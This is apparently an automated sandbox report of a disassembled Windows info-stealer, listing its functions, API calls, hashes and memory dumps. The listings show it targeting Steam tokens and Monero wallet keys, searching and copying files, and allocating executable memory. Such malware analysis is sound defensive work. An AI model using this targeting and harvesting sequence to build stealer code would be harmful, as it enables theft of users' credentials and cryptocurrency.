Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: 121ba6793a00d42ed5ab90b49b9617999661feb50baba7d93738db3fa38036a9
Instruction ID: 7906af5487553b0a55a28b34f19c43c6edc36a46b3524d96d15807d1922ef571
Opcode Fuzzy Hash: 121ba6793a00d42ed5ab90b49b9617999661feb50baba7d93738db3fa38036a9
Instruction Fuzzy Hash: 54515AB0D042189BDB64EBA0DC81BEEB374AF54304F5080A9E255761C2EBB46E88CF59

Function 00105100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A820: lstrlen.KERNEL32(000F4F05,?,?,000F4F05,00110DDE), ref: 0010A82B
Part of subcall function 0010A820: lstrcpy.KERNEL32(00110DDE,00000000), ref: 0010A885

lstrlen.KERNEL32(00000000,00000000,00110ACA), ref: 0010512A

Strings

steam_tokens.txt, xrefs: 0010513F

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: dc14a6b8281564aaf2c404e3184a6c82311795340c9d078ad15121216afbb149
Instruction ID: cc053ce6c9bf89cca313face096decf9e55917842f8ea632505fb2d2882afa73
Opcode Fuzzy Hash: dc14a6b8281564aaf2c404e3184a6c82311795340c9d078ad15121216afbb149
Instruction Fuzzy Hash: 9FF01D71D10208A6CB08F7B0EC57DED733C9F64300F808169B597624D2EFB56609C7A2

Function 00107ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00110E2C), ref: 00107F00
wsprintfA.USER32 ref: 00107F16

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 2ede5033f1b69fba617642dd33b77d115da79199393e340ecef7b8c72a4bbc7f
Instruction ID: 35151ce950770a078aa75072bbac908f68da598ff96be09d3a6ddf62727fd07c
Opcode Fuzzy Hash: 2ede5033f1b69fba617642dd33b77d115da79199393e340ecef7b8c72a4bbc7f
Instruction Fuzzy Hash: A3F06DB1A04618EBCB14DF84EC85FAAB7BCFB48B24F000669F61592280D7B569448BE1

Function 000FB4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

lstrlen.KERNEL32(00000000), ref: 000FB9C2
lstrlen.KERNEL32(00000000), ref: 000FB9D6

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: a37ba5f07062d6539becda4606d0f28dc1bb0b61f5f58b9019249acb1f5211a6
Instruction ID: d7d7c90c120d281242cb420555016805edc1e9974c649d7f4aeeb88c339f048a
Opcode Fuzzy Hash: a37ba5f07062d6539becda4606d0f28dc1bb0b61f5f58b9019249acb1f5211a6
Instruction Fuzzy Hash: 9EE103729102189BDB05FBA0CD96EEE733CBF74301F808569F146660D1EFB46A49CB62

Function 000FAEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

lstrlen.KERNEL32(00000000), ref: 000FB16A
lstrlen.KERNEL32(00000000), ref: 000FB17E

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 219a13be11b41f49dc3d04706a49ab5f474f79d8eb2617144982eaa8b96afe76
Instruction ID: 1b72bebe3b1a237cb94c1126995db519e85a10c1ea6f9bacf72d306fa6c1241a
Opcode Fuzzy Hash: 219a13be11b41f49dc3d04706a49ab5f474f79d8eb2617144982eaa8b96afe76
Instruction Fuzzy Hash: BD9106719102089BDB05FBA0DD96EEE737CBF64301F808169F547A60D1EF746A49CB62

Function 000FB230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

lstrlen.KERNEL32(00000000), ref: 000FB42E
lstrlen.KERNEL32(00000000), ref: 000FB442

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 40afa29c8de723c95753b91eb4ebc623c5929a5d85690813a7326036d496d15e
Instruction ID: b07f3ac96e4da03ff60edc69f06e0d8f62a3783760725325b42c800d3f2b7faf
Opcode Fuzzy Hash: 40afa29c8de723c95753b91eb4ebc623c5929a5d85690813a7326036d496d15e
Instruction Fuzzy Hash: 847112719102089BDB05FBA0DD96EEE737CBF64305F804529F586A70D1EF746A09CBA2

Function 00104BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00108DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00108E0B

lstrcat.KERNEL32(?,00000000), ref: 00104BEA
lstrcat.KERNEL32(?,00CDDAC0), ref: 00104C08

Part of subcall function 00104910: wsprintfA.USER32 ref: 0010492C
Part of subcall function 00104910: FindFirstFileA.KERNEL32(?,?), ref: 00104943

Part of subcall function 00104910: StrCmpCA.SHLWAPI(?,00110FDC), ref: 00104971
Part of subcall function 00104910: StrCmpCA.SHLWAPI(?,00110FE0), ref: 00104987
Part of subcall function 00104910: FindNextFileA.KERNEL32(000000FF,?), ref: 00104B7D
Part of subcall function 00104910: FindClose.KERNEL32(000000FF), ref: 00104B92

Part of subcall function 00104910: wsprintfA.USER32 ref: 001049B0
Part of subcall function 00104910: StrCmpCA.SHLWAPI(?,001108D2), ref: 001049C5
Part of subcall function 00104910: wsprintfA.USER32 ref: 001049E2
Part of subcall function 00104910: PathMatchSpecA.SHLWAPI(?,?), ref: 00104A1E
Part of subcall function 00104910: lstrcat.KERNEL32(?,00CDE8A8), ref: 00104A4A
Part of subcall function 00104910: lstrcat.KERNEL32(?,00110FF8), ref: 00104A5C
Part of subcall function 00104910: lstrcat.KERNEL32(?,?), ref: 00104A70
Part of subcall function 00104910: lstrcat.KERNEL32(?,00110FFC), ref: 00104A82
Part of subcall function 00104910: lstrcat.KERNEL32(?,?), ref: 00104A96
Part of subcall function 00104910: CopyFileA.KERNEL32(?,?,00000001), ref: 00104AAC
Part of subcall function 00104910: DeleteFileA.KERNEL32(?), ref: 00104B31

Part of subcall function 00104910: wsprintfA.USER32 ref: 00104A07

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: bf24cd971d3981d64681cb6a8577cee31f556a57acf70e7472c61d0448098f9f
Instruction ID: c50b823619bbd6886ec35c5210dc8d5a048fa5dd3381f2a725c4300e51378ede
Opcode Fuzzy Hash: bf24cd971d3981d64681cb6a8577cee31f556a57acf70e7472c61d0448098f9f
Instruction Fuzzy Hash: 5F41A7BA900504A7C755F7A0EC82EFE337DA798700F408558B6C957186EEB59BCC8B92

Function 000F6660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 000F6706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000F6753

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
